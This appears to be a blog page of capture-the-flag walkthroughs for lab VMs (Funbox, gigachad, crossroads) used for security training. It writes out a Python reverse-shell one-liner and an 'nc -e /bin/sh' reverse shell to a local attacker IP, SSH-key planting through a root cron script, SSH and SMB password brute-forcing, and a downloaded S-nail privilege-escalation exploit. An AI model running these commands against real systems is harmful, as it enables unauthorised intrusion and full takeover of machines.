cd /root;python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.56.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'

Subsequently I used the same steps 2.1 and 2.3 to get to the root access.

Method 2:

2.1

cd /home/joe
ssh_keygen

2.2

cd /home/funny 
vim .backup.sh 
#!/bin/bash
#tar -cf /home/funny/html.tar /var/www/html
mkdir .ssh;cd .ssh;echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCqvs7afmMTVFzD02GdHRTfyoBIA8YAT79i62mYr02VA3oObWdWSaJQelTFonpfPIBewBfbibtYGdnkpfvKkU/489nNx/75nemQy3Yq8jcBkqUOP4MWfWCs9qetqaok72/OMetNk4Q0zOeZTRYgu/tuAeA/IlIKr5niIrxNePBFRm+w3Rszt55PcoXUb2GuPU9CL42fqKfn53ypOh6tRWW16Uxx/eRm3p83Rpc8Wh2aOpZOG0i6bEEtByhsaA0Ez7hMf7aDRvunH3Qp8K6pRloTGXESwXC1SuL/5k5tfQDTw3+KpoKhMntvc1GG8Bd0/Blmy6U7+gaABXjMo2GVi8S2ZlC+UoYQAgNLiOqPMe2+fFEppk47WVmgKh2XY6XeSbG5UrXgwSN6MIPmWNIewpa/ucNQm0i0SqeZXtjCctEGRTbEeJGRhIwTknxnUWBMWA8tH/wNWWzKFjeOVIOwmWwSxrm6KJQuds4kOHSAh0HjN0AeYjEX7aNigOb3HEVNnac= joe@funbox" > authorized_keys

Do you see .ssh folder ? (which was not there earlier)

Now, with through joe’s account, I am able to log into the funny account, using the SSH.

And my initial hunch was right that there is indeed a crontab entry under username funny

To escalate the privilege further, how about we repeat the 2.2 steps and, this time, we will try to access root account through SSH.

2.3

#!/bin/bash
#tar -cf /home/funny/html.tar /var/www/html
cd /root;mkdir .ssh;cd .ssh;echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCqvs7afmMTVFzD02GdHRTfyoBIA8YAT79i62mYr02VA3oObWdWSaJQelTFonpfPIBewBfbibtYGdnkpfvKkU/489nNx/75nemQy3Yq8jcBkqUOP4MWfWCs9qetqaok72/OMetNk4Q0zOeZTRYgu/tuAeA/IlIKr5niIrxNePBFRm+w3Rszt55PcoXUb2GuPU9CL42fqKfn53ypOh6tRWW16Uxx/eRm3p83Rpc8Wh2aOpZOG0i6bEEtByhsaA0Ez7hMf7aDRvunH3Qp8K6pRloTGXESwXC1SuL/5k5tfQDTw3+KpoKhMntvc1GG8Bd0/Blmy6U7+gaABXjMo2GVi8S2ZlC+UoYQAgNLiOqPMe2+fFEppk47WVmgKh2XY6XeSbG5UrXgwSN6MIPmWNIewpa/ucNQm0i0SqeZXtjCctEGRTbEeJGRhIwTknxnUWBMWA8tH/wNWWzKFjeOVIOwmWwSxrm6KJQuds4kOHSAh0HjN0AeYjEX7aNigOb3HEVNnac= joe@funbox" > authorized_keys
#mkdir .ssh;cd .ssh;echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCqvs7afmMTVFzD02GdHRTfyoBIA8YAT79i62mYr02VA3oObWdWSaJQelTFonpfPIBewBfbibtYGdnkpfvKkU/489nNx/75nemQy3Yq8jcBkqUOP4MWfWCs9qetqaok72/OMetNk4Q0zOeZTRYgu/tuAeA/IlIKr5niIrxNePBFRm+w3Rszt55PcoXUb2GuPU9CL42fqKfn53ypOh6tRWW16Uxx/eRm3p83Rpc8Wh2aOpZOG0i6bEEtByhsaA0Ez7hMf7aDRvunH3Qp8K6pRloTGXESwXC1SuL/5k5tfQDTw3+KpoKhMntvc1GG8Bd0/Blmy6U7+gaABXjMo2GVi8S2ZlC+UoYQAgNLiOqPMe2+fFEppk47WVmgKh2XY6XeSbG5UrXgwSN6MIPmWNIewpa/ucNQm0i0SqeZXtjCctEGRTbEeJGRhIwTknxnUWBMWA8tH/wNWWzKFjeOVIOwmWwSxrm6KJQuds4kOHSAh0HjN0AeYjEX7aNigOb3HEVNnac= joe@funbox" > authorized_keys

In this step, I did nothing special, apart from cd /root;. Because my plan is to Change the directory there and then do the whole thing same as we did with funny account.

Voila!!  I got the root flag!!

 

 

No Comments

Taking down gigachad

Overview: 

Target Machine IP Address: 192.168.56.110  
My Machine IP Address: 192.168.56.1

Mission:

Boot to Root
1. To get user flag
2. To get root flag
3. To get root access

Level: Easy 

linpeas.sh did wonder as always

Download:

You can download the machine from here.

************************************

Information Gathering & Scanning Process:

sudo arp-scan --interface=vboxnet0 192.168.56.1/24

Target IP: 192.168.56.110

nmap -sC -sV -p- -Pn 192.168.56.110 -o nmap.log
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-r-xr-xr-x 1 1000 1000 297 Feb 07 17:33 chadinfo

22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)

80/tcp open http Apache httpd 2.4.38 ((Debian))
| http-robots.txt: 1 disallowed entry 
|_/kingchad.html
  1. FTP

file chadinfo   (it is an archived or zipped file)
unzip chadinfo 

strings chadinfo

I found there is a username=chad  and a file at  /drippinchad.png

  2. SSH

Then I tried to brute-force the ssh (because we know that the system is running ssh service from the nmap result) using hydra and medusa (it is becoming my favorite brute-force tool)

However, I tried every method I am aware of but couldn’t figure out. So I had to sneak other people’s walkthrough and I came to know that the hint was related with  /drippinchad.png . I too upload the image in google image search engine and I came to know that the tower is called Maiden’s Tower. So, I made a list of these passwords (save it as password.txt).

– Maiden’sTower
– MaidensTower
– Maiden
– MaidenTower

medusa -h 192.168.56.110 -u chad -P password.txt -M ssh

P.S. I have added the above words in the rockyou.txt

ssh chat@192.168.56.110
password: maidenstower

Post Exploitation:

Let’s use my favourite tool linpeas.sh 

searchsploit S-nail

cp /usr/share/exploitdb/exploits/multiple/local/47172.sh .

However, this one worked for me. https://raw.githubusercontent.com/bcoles/local-exploits/master/CVE-2017-5899/exploit.sh   (I downloaded this on my Kali Machine and then uploaded to /tmp of victim machine)

chmod +x exploit.sh 
./exploit    (I had to run it couple of times to get the root)

cat /root/root.txt

3. HTTP

I found robots.txt and couple more information like hash files in source code etc. But it was just a rabit hole to me so I didn’t write it here provided you were wondering the writer was on luck 😉

Note: This machine took me quite sometime to research and had to peek other write-up as well, specially google image scanning is my first time to try that. However, over all, I had a nice good time taking down this machine.

No Comments

crossroads walk-through

Overview: 

Target Machine IP Address: 192.168.56.105  
My Machine IP Address: 192.168.56.1

Mission:

Boot to Root
1. To get user flag
2. To get root flag
3. To get root access

Level: Medium 

I had to copy python script from other people and it took me sometime to troubleshoot.

Download:

You can download the machine from here.

************************************

Information Gathering & Scanning Process:

sudo arp-scan --interface=vboxnet0 192.168.56.1/24

We came to know our target or victim machine IP: 192.168.56.105

nmap -sC -sV -p- -Pn 192.168.56.121 -o nmap.log

Output: (Information redacted)

# Nmap 7.91 scan initiated Sun May 30 08:10:34 2021 as: nmap -sC -sV -p- -Pn -o nmap.log 192.168.56.105
Nmap scan report for 192.168.56.105
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.38 ((Debian))
| http-robots.txt: 1 disallowed entry 
|_/crossroads.png
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: 12 Step Treatment Center | Crossroads Centre Antigua
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.9.5-Debian (workgroup: WORKGROUP)
Service Info: Host: CROSSROADS

Host script results:
|_clock-skew: mean: 1h39m58s, deviation: 2h53m12s, median: -1s
|_nbstat: NetBIOS name: CROSSROADS, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery: 
| OS: Windows 6.1 (Samba 4.9.5-Debian)
| Computer name: crossroads
| NetBIOS computer name: CROSSROADS\x00
| Domain name: \x00
| FQDN: crossroads
|_ System time: 2021-05-29T21:40:49-05:00
| smb-security-mode: 
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
| 2.02: 


http://192.168.56.105/robots.txt

http://192.168.56.105/crossroads.png

I didn’t get anything useful through exiftool (metadata)

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://192.168.56.105/ -x php,txt,html,bak -o gobuster.log

Ok, based on nmap result, we got, the system is running SMB protocol, so let’s do some enumeration

Enumerate SMB Protocol 

 nmap --script smb-vuln* -p 139,445 192.168.56.105 -o nmap.log
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-30 08:30 IST
Nmap scan report for 192.168.56.105
PORT STATE SERVICE
137/tcp closed netbios-ns
139/tcp open netbios-ssn
445/tcp open microsoft-ds

Host script results:
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: false
| smb-vuln-regsvc-dos: 
| VULNERABLE:
| Service regsvc in Microsoft Windows systems vulnerable to denial of service
| State: VULNERABLE
| The service regsvc in Microsoft Windows 2000 systems is vulnerable to denial of service caused by a null deference
| pointer. This script will crash the service if it is vulnerable. This vulnerability was discovered by Ron Bowes
| while working on smb-enum-sessions.
enum4linux -A 192.168.56.105

 

User: albert

Let’s do a bruteforce and try our luck 😉

Brute Force Method 1: (working)

medusa -h 192.168.56.105 -u albert -P /usr/share/wordlists/rockyou.txt -M smbnt

ACCOUNT FOUND: [smbnt] Host: 192.168.56.105 User: albert Password: bradley1 [SUCCESS (ADMIN$ – Share Unavailable)]

****************************************************8

Brute Force Method 2: (not fixed yet.)

hydra -l albert -P /usr/share/wordlists/rockyou.txt 192.168.56.105 smb

nmap -p445 –script smb-brute –script-args userdb=albert,passdb=/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt 192.168.56.105

nmap -p 135,139,445 --script smb-pwdump --script-args-smbuser=USERNAME,smbpass=PASSWORD <Target>

 

****************************************************

smbclient //192.168.56.105/albert -U albert

Password: bradley1

Note: You can use get filename to download all the files you want.

We got the first flag:

I got stuck here. So I need to figure out what I need to do with the information I got so far (if the information is not enough I need to dig more which means enumerate more)

I read the entire smb.conf and only thing which I feel fishy (or favorable to us is this line)

[smbshare]

path = /home/albert/smbshare
valid users = albert
browsable = yes
writable = yes
read only = no
magic script = smbscript.sh
guest ok = no

To be honest, I am not sure what it is, so had to google it.  I got a perfect link. If you do not want to read the entire blog. Following line is enough for us

**************************************
magic script

If the
magic
script option is set to a filename and the client creates a file by that name in that share, Samba will run the file as soon as the user has opened and closed it. For example, let’s assume that the following option was created in the share
[accounting]:

[accounting]
	magic script = tally.sh

Samba continually monitors the files in that share. If one by the name of tally.sh is closed (after being opened) by a user, Samba will execute the contents of that file locally. The file will be passed to the shell to execute; it must therefore be a legal Unix shell script. This means that it must have newline characters as line endings instead of Windows CR/LFs. In addition, it helps if you use the
#! directive at the beginning of the file to indicate under which shell the script should run.

**************************************

So what I want to do now is to upload a reverse shell /home/albert/smbshare  magic script = smbscript.sh

On Kali Linux

vim smbscript.sh

nc -e /bin/sh 192.168.56.1 1234

On one Terminal type:

nc -lvp 1234

Let’s connect to the smbshare now.  (as soon as you put the script, you will receipt the reverse connection)

smbclient //192.168.56.105/smbshare -U albert

Password: bradley1

put smbscript.sh

Post Exploitation 

python3 -c "import pty;pty.spawn('/bin/bash')";

export TERM=xterm

Enumeration:

I have uploaded the linpeas.sh at the /tmp of victim machine.

-rwsr-xr-x 1 root root 17K Mar 2 17:02 /home/albert/beroot 

file beroot
beroot: setuid ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=c1da1f0fded1889d32e27b99a2a4bd170c30349b, for GNU/Linux 3.2.0, not stripped
xxd beroot

/bin/bash /root/beroot.sh

I can sense that this binary is performing the above command. But I am not sure what beroot is, so I did a google.

 

“BeRoot is a post exploitation tool to check common misconfigurations on Window, Linux and Mac OS to find a way to escalate our privilege.”

./beroot   # asks password for the root

Yes, since it is asking a password for the root. Let’s upload rockyou.txt into the victim machine and bruteforce the beroot binary.

source code: 1 2

#/usr/bin/python3
import subprocess

passList = open('rockyou.txt', 'r', encoding = "ISO-8859-1").readlines()
#with open('rockyou.txt', 'r') as f:
# passList = f.readlines() 
for passwd in passList:
    response = subprocess.getoutput('echo "{}" | ./beroot'.format(passwd))
    if 'wrong password!!!' not in response:
        print('Password found: {}'.format(passwd))
        break
if 'wrong password!!!' not in response:
    print("This is the output: \n{}".format(response))

cat rootcreds
root
___drifting___

I tried to provide the password for ./beroot but it was not accepting so I thought why not try to switch to root user with the password …

su - root

___drifting___

 

cat root.txt

I am going to buy vegetables now as the market is going to close soon (because of COVID).. Anyway, wish you have a happy weekend 🙂

 

 

 

 

 

No Comments